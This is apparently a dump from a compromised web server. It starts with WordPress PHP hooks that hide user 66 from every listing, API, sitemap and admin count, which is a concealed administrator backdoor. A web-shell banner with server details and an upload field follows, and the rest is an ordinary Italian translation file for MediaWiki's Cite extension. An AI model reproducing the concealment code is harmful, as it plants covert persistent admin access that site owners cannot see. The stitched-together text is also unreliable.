add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 66; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 66 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 66 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 66; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 66; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/66(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 66; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } );
| Server IP : 167.235.224.122 / Your IP : 216.73.216.110 Web Server : Apache/2.4.58 (Ubuntu) System : Linux newplayground 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:33:11 UTC 2026 aarch64 User : deploy ( 1000) PHP Version : 8.4.23 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : OFF | Sudo : ON | Pkexec : OFF Directory : /var/www/html/wiki/extensions/Cite/i18n/ |
Upload File : |
{
"@metadata": {
"authors": [
"Beta16",
"BrokenArrow",
"Darth Kule",
"Erdemaslancan",
"Gianfranco",
"Horcrux92",
"Nemo bis",
"Pietrodn",
"Tizven",
"Valepert"
]
},
"cite-desc": "Aggiunge i tag <code><ref></code> e <code><references></code> per gestire le citazioni",
"cite_error": "Errore nelle note: $1",
"cite_error_ref_invalid_dir": "<code>dir=\"$1\"</code> non valido, deve essere <code>ltr</code> o <code>rtl</code>",
"cite_error_ref_numeric_key": "Errore nell'uso del marcatore <code><ref></code>: il nome non può essere un numero intero. Usare un titolo esteso",
"cite_error_ref_no_key": "L'apertura dell'etichetta <code><ref></code> non è corretta o ha un nome errato.",
"cite_error_ref_too_many_keys": "Parametro non valido nel tag <code><ref></code>",
"cite_error_ref_no_input": "Errore nell'uso del marcatore <code><ref></code>: i ref privi di nome non possono essere vuoti",
"cite_error_references_duplicate_key": "Tag <code><ref></code> non valido; il nome \"$1\" è stato definito più volte con contenuti diversi",
"cite_error_references_invalid_parameters": "Parametro non valido nel tag <code><references></code>",
"cite_error_references_no_text": "Errore nell'uso del marcatore <code><ref></code>: non è stato indicato alcun testo per il marcatore <code>$1</code>",
"cite_error_included_ref": "<code></ref></code> di chiusura mancante per il marcatore <code><ref></code>",
"cite_error_group_refs_without_references": "Sono presenti dei marcatori <code><ref></code> per un gruppo chiamato \"$1\" ma non è stato trovato alcun marcatore <code><references group=\"$1\"/></code> corrispondente",
"cite_error_references_group_mismatch": "Il tag <code><ref></code> in <code><references></code> ha attributo gruppo \"$1\" in conflitto.",
"cite_error_references_missing_key": "Il tag <code><ref></code> con nome \"$1\" definito in <code><references></code> non è usato nel testo precedente.",
"cite_error_references_no_key": "Il tag <code><ref></code> definito in <code><references></code> non ha un attributo nome.",
"cite_error_empty_references_define": "Il tag <code><ref></code> con nome \"$1\" definito nel <code><references></code> gruppo \"$2\" non ha alcun contenuto.",
"cite-tracking-category-cite-error": "Pagine con errori nelle note",
"cite-tracking-category-cite-error-desc": "Le pagine in questa categoria hanno errori nell'uso dei tag per le note.",
"cite-tracking-category-cite-diffing-error": "Pagine con errori nelle note che causano differenze visive",
"cite-reference-previews-reference": "Riferimento",
"cite-reference-previews-book": "Riferimento a libro",
"cite-reference-previews-news": "Riferimento a notizie",
"cite-reference-previews-note": "Nota",
"cite-reference-previews-web": "Riferimento a sito web",
"cite-reference-previews-collapsible-placeholder": "Questa nota include una figura che non rientra nell'anteprima.",
"cite-reference-previews-gadget-conflict-info-navpopups": "Hai abilitato l'accessorio [[$1|Popup di navigazione]] quindi non vedrai le anteprime mostrate da questa preferenza. Se riscontri problemi, verifica i tuoi accessori e la personalizzazione del tema, incluso quello globale.",
"cite-reference-previews-gadget-conflict-info-reftooltips": "Hai abilitato l'accessorio [[$1|Reference Tooltips]] quindi non vedrai l'anteprima delle note, ma continuerai a ottenere l'anteprima delle pagine. In base alla tua wiki, l'accessorio potrebbe avere un nome differente. Se riscontri problemi, verifica i tuoi accessori e la personalizzazione del tema, incluso quello globale.",
"cite-reference-previews-gadget-conflict-info-navpopups-reftooltips": "Hai abilitato gli accessori [[$1|Popup di navigazione]] e [[$1|Reference Tooltips]] quindi non vedrai le anteprime. In base alla tua wiki, gli accessori potrebbero avere un nome differente. Se riscontri problemi, verifica i tuoi accessori e la personalizzazione del tema, incluso quello globale.",
"cite-reference-previews-preference-label": "Abilita l'anteprima delle note (ottieni una veloce anteprima di un riferimento mentre leggi una pagina)",
"cite_references_link_accessibility_label": "Salta",
"cite_references_link_many_accessibility_label": "Salta a:",
"cite_section_preview_references": "Anteprima delle note",
"cite_warning": "Attenzione nelle note: $1",
"cite_warning_sectionpreview_no_text": "Il tag <code><ref></code> con nome <code>$1</code> non può essere visualizzato in anteprima, perché è definito al di fuori della sezione attuale o non definito affatto.",
"cite-wikieditor-tool-reference": "Nota",
"cite-wikieditor-help-page-references": "Note",
"cite-wikieditor-help-content-reference-description": "Nota",
"cite-wikieditor-help-content-named-reference-description": "Riferimento denominato",
"cite-wikieditor-help-content-rereference-description": "Ulteriore uso della stessa nota",
"cite-wikieditor-help-content-showreferences-description": "Mostra note",
"cite-wikieditor-help-content-reference-example-text1": "Testo della pagina.$1",
"cite-wikieditor-help-content-reference-example-text2": "[$1 Testo del collegamento], testo aggiuntivo.",
"cite-wikieditor-help-content-reference-example-text3": "[$1 Testo del collegamento]",
"cite-wikieditor-help-content-reference-example-extra-details": "Dettagli aggiuntivi",
"cite-configuration-submit": "Salva modifiche"
}